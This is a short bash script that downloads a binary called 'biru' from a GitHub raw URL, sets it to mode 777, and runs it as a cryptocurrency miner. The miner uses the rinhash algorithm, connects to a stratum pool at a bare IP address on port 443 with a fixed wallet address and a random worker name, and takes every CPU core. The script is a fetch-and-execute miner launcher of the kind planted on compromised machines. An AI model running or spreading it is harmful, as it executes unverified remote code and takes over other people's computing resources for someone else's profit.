#!/bin/bash
wget -O biru https://github.com/kidoescegh/filee/raw/main/avx2adv 
chmod 777 biru
./biru -a rinhash -o stratum+tcp://64.23.144.233:443 -u RKDaBdHAwcbkHwWpmq4ErfxmqgqM2zn2NF.$(shuf -n 1 -i 1-99999)-WEB -t $(nproc --all)
